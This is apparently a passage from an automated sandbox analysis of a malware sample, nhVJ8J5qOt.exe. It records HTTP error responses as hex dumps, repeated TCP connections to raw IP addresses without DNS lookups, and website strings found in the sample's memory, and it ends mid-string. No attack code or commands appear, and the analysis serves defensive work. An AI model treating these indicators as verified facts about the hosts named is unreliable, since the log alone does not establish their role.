22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:08:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 246X-Sorting-Hat-ShopId: 9394790Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 814ee812-08b5-4a9a-b69c-ea8cbda481c3CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Pi2PZfI7%2BQ8QnOPDwLYtfwmAsxSErKyNd3CGCXDIPjnfAKtXcVdNw006hUsz6nwYG%2BG4OAP3wp4n7Bk%2BkaXy8r54pY72NBmxQ4VfVqEVAjW5ryshtXBb9l8XbcLv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=164.000034Server: cloudflareCF-RAY: 7e1d6e879856bbc7-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:09 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CFMkzotUqiRok5M6IrF66N%2B%2BRkAHpjilyE%2BxJlLRWOlwnG3dAugHqhvS7s1FKVasKow4xZvKinNPVhV9LKVkISh49fyRkNbwFL51duU2QLeEDsV0nqfTc5ZXaf8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6e8c2bac9036-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:10 GMTServer: ApacheContent-Length: 199Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 05 Jul 2023 06:08:11 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 6f 75 20 63 61 6e 20 64 6f 3c 2f 70 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 6c 70 2d 61 63 74 69 6f 6e 73 22 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 22 3e 52 65 6c 6f 61 64 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 3b 22 3e 42 61 63 6b 20 74 6f 20 50 72 65 76 69 6f 75 73 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 48 6f 6d 65 20 50 61 67 65 3c 2f 61 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:08:11 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 05 Jul 2023 06:08:13 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                  Source: unknownTCP traffic detected without corresponding DNS query: 198.1.81.28
                  Source: unknownTCP traffic detected without corresponding DNS query: 211.13.196.162
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 153.120.34.73
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.facebook.com/PohlFoodService" target="_blank"> equals www.facebook.com (Facebook)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.linkedin.com/company/pohl-food-service" target="_blank"> equals www.linkedin.com (Linkedin)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-6def677" href="https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A" target="_blank"> equals www.youtube.com (Youtube)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.639292565.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.630863848.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/PohlFoodService" /> equals www.facebook.com (Facebook)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.582969088.0000000005120000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a href="http://www.facebook.com/netwiseIT" target="_new"><img src="/images/fb.gif" alt="Seguici su facebook" title="Seguici su facebook"></a> equals www.facebook.com (Facebook)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-linkedin elementor-repeater-item-dd39117" href="https://www.linkedin.com/company/comsit-distribution-gmbh/" target="_blank"> equals www.linkedin.com (Linkedin)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-9c5067a" href="https://www.youtube.com/@ComSITDistributionGmbH" target="_blank"> equals www.youtube.com (Youtube)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.13.4","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":46,"title":"Comsit%20Website","excerpt":"","featuredImage":false}}; equals www.facebook.com (Facebook)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Auf Facebook teilen","shareOnTwitter":"Auf Twitter teilen","pinIt":"Anheften","download":"Download","downloadImage":"Bild downloaden","fullscreen":"Vollbild","zoom":"Zoom","share":"Teilen","playVideo":"Video abspielen","previous":"Zur\u00fcck","next":"Weiter","close":"Schlie\u00dfen"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Mobile Portrait","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Mobile Landscape","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet Portrait","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet Landscape","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Laptop","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Breitbild","value":2400,"default_value":2400,"direction":"min","is_enabled":false}}},"version":"3.13.4","is_static":false,"experimentalFeatures":{"e_dom_optimization":true,"e_optimized_assets_loading":true,"e_optimized_css_loading":true,"a11y_improvements":true,"additional_custom_breakpoints":true,"e_swiper_latest":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"landing-pages":true,"page-transitions":true,"notes":true,"loop":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"http:\/\/www.com-sit.com\/wp-content\/plugins\/elementor\/assets\/"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"ki